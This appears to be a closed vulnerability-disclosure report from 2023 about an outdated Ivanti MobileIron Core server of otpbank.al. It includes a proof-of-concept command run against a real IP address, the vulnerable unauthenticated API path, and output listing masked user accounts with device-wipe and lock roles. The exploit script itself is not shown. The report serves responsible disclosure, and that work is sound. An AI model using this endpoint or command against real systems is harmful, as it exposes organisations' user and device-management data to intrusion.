• Creation
  • Validation
  • Communication & fix
  • Disclosure

otpbank.al / Ivanti MobileIron core is outdated

Chocapikk reported 2023-08-05

The following Ivanti MobileIron instance is publicly accessible and looks out-dated :

It is critical to update to a safe version as soon as possible since it could lead to instance and devices takeover. Those vulnerabilities are currently used in ransomware campaign and could damage your network.

Reference:

Proof Of Concept:

$ python3.10 exploit.py --verbose -u https://80.78.65.45:443                                      9:14:39 
Fetching data from: https://80.78.65.45:443/mifs/asfV3/api/v2/authorized/users?adminDeviceSpaceId=1
The response is not a valid JSON. The site is not vulnerable.
Fetching data from: https://80.78.65.45:443/mifs/aad/api/v2/authorized/users?adminDeviceSpaceId=1
https://80.78.65.45:443 may be vulnerable to CVE-2023-35078
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.otpbank.al
Roles: ROLE_MPW_WIPE, ROLE_MPW_LOCATE, ROLE_MPW_RESET_PIN, ROLE_MPW_RESET_AC_PASSCODE, ROLE_MPW_LOCK, 
ROLE_MPW_CHANGE_OWNERSHIP, ROLE_MPW_RETIRE, ROLE_MPW_REG, ROLE_MPW_UNLOCK, ROLE_USER_PORTAL_RW
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.otpbank.al
Roles: ROLE_MPW_WIPE, ROLE_MPW_LOCATE, ROLE_MPW_RESET_AC_PASSCODE, ROLE_MPW_LOCK, 
ROLE_MPW_CHANGE_OWNERSHIP, ROLE_MPW_RETIRE, ROLE_USER_GOOGLE_DEVICE_ACCOUNT, ROLE_MPW_REG, 
ROLE_MPW_UNLOCK, ROLE_USER_PORTAL_RW
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.otpbank.al
Roles: 
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.otpbank.al
Roles: 
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.otpbank.al
Roles: ROLE_MPW_WIPE, ROLE_MPW_LOCATE, ROLE_MPW_RESET_PIN, ROLE_MPW_RESET_AC_PASSCODE, ROLE_MPW_LOCK, 
ROLE_MPW_CHANGE_OWNERSHIP, ROLE_MPW_RETIRE, ROLE_MPW_REG, ROLE_MPW_UNLOCK, ROLE_USER_PORTAL_RW
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.otpbank.al
Roles: ROLE_MPW_WIPE, ROLE_MPW_LOCATE, ROLE_MPW_RESET_PIN, ROLE_MPW_RESET_AC_PASSCODE, ROLE_MPW_LOCK, 
ROLE_MPW_CHANGE_OWNERSHIP, ROLE_MPW_RETIRE, ROLE_MPW_REG, ROLE_MPW_UNLOCK, ROLE_USER_PORTAL_RW
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.otpbank.al
Roles: ROLE_MPW_WIPE, ROLE_MPW_LOCATE, ROLE_MPW_RESET_PIN, ROLE_MPW_RESET_AC_PASSCODE, ROLE_MPW_LOCK, 
ROLE_MPW_CHANGE_OWNERSHIP, ROLE_MPW_RETIRE, ROLE_MPW_REG, ROLE_MPW_UNLOCK, ROLE_USER_PORTAL_RW
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.otpbank.al
Roles: ROLE_MPW_WIPE, ROLE_MPW_LOCATE, ROLE_MPW_RESET_PIN, ROLE_MPW_RESET_AC_PASSCODE, ROLE_MPW_LOCK, 
ROLE_MPW_CHANGE_OWNERSHIP, ROLE_MPW_RETIRE, ROLE_MPW_REG, ROLE_MPW_UNLOCK, ROLE_USER_PORTAL_RW
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.otpbank.al
Roles: ROLE_MPW_WIPE, ROLE_MPW_LOCATE, ROLE_MPW_RESET_PIN, ROLE_MPW_RESET_AC_PASSCODE, ROLE_MPW_LOCK, 
ROLE_MPW_CHANGE_OWNERSHIP, ROLE_MPW_RETIRE, ROLE_MPW_REG, ROLE_MPW_UNLOCK, ROLE_USER_PORTAL_RW
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.otpbank.al
Roles: ROLE_MPW_WIPE, ROLE_MPW_LOCATE, ROLE_MPW_RESET_PIN, ROLE_MPW_RESET_AC_PASSCODE, ROLE_MPW_LOCK, 
ROLE_MPW_CHANGE_OWNERSHIP, ROLE_MPW_RETIRE, ROLE_MPW_REG, ROLE_MPW_UNLOCK, ROLE_USER_PORTAL_RW
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.otpbank.al
Roles: ROLE_MPW_WIPE, ROLE_MPW_LOCATE, ROLE_MPW_RESET_PIN, ROLE_MPW_RESET_AC_PASSCODE, ROLE_MPW_LOCK, 
ROLE_MPW_CHANGE_OWNERSHIP, ROLE_MPW_RETIRE, ROLE_MPW_REG, ROLE_MPW_UNLOCK, ROLE_USER_PORTAL_RW
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.otpbank.al
Roles: ROLE_MPW_WIPE, ROLE_MPW_LOCATE, ROLE_MPW_RESET_PIN, ROLE_MPW_RESET_AC_PASSCODE, ROLE_MPW_LOCK, 
ROLE_MPW_CHANGE_OWNERSHIP, ROLE_MPW_RETIRE, ROLE_MPW_REG, ROLE_MPW_UNLOCK, ROLE_USER_PORTAL_RW
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.otpbank.al
Roles: ROLE_MPW_WIPE, ROLE_MPW_LOCATE, ROLE_MPW_RESET_PIN, ROLE_MPW_RESET_AC_PASSCODE, ROLE_MPW_LOCK, 
ROLE_MPW_CHANGE_OWNERSHIP, ROLE_MPW_RETIRE, ROLE_MPW_REG, ROLE_MPW_UNLOCK, ROLE_USER_PORTAL_RW
IP:
80.78.65.45
Port:
443
Detected protocol:
https
Vulnerable URL:
https://80.78.65.45
Found vulnerable Ivanti MobileIron Core instance:
Affected by CVE-2023-35082
Affected by CVE-2023-35078
Affected by CVE-2023-35081

WARNING: This event relies on the version reported by the software and might not account for manual patching of older versions. Please discard if manual RPM patch has been applied.
Found by MobileIronCorePlugin 2023-08-03
Report created by Chocapikk  2023-08-05
Report approved by BloodyShell  2023-08-05
New PDF report generated by system 2023-08-05
Report dispatched to ...@... by system 2023-08-05
Report dispatched to ...@... by system 2023-08-05
Report dispatched to ...@... by system 2023-08-05
Report dispatched to ...@... by system 2023-08-05
Report dispatched to ...@... by system 2023-08-05
Report dispatched to ...@... by system 2023-08-05
Report dispatched to ...@... by system 2023-08-05
Report dispatched to ...@... by system 2023-08-05
Report dispatched to ...@... by system 2023-08-05
Report dispatched to ...@... by system 2023-08-05
Report edited by BloodyShell  2023-08-13
New PDF report generated by system 2023-08-13
Report marked as fixed by BloodyShell  2023-08-13
Report closed by BloodyShell  2023-08-13
New PDF report generated by system 2023-08-13
Report edited by BloodyShell  2023-08-13
New PDF report generated by system 2023-08-13
Report edited by Chocapikk  2023-08-13
New PDF report generated by system 2023-08-13
Report edited by BloodyShell  2024-03-14
New PDF report generated by system 2024-03-14
Report edited by BloodyShell  2024-03-14
New PDF report generated by system 2024-03-14
Information
Owner otpbank.al
Created 2023-08-05 19:15
Updated 2024-12-04 03:22
Fixed true

Contacts
A...@otpbank.al
i...@otpbank.al
A...@otpbank.al
A...@otpbank.al
A...@otpbank.al
A...@otpbank.al
A...@otpbank.al
A...@otpbank.al
A...@otpbank.al
A...@otpbank.al

Status
Status closed
Hosting contacted false
CERT contacted false

Download report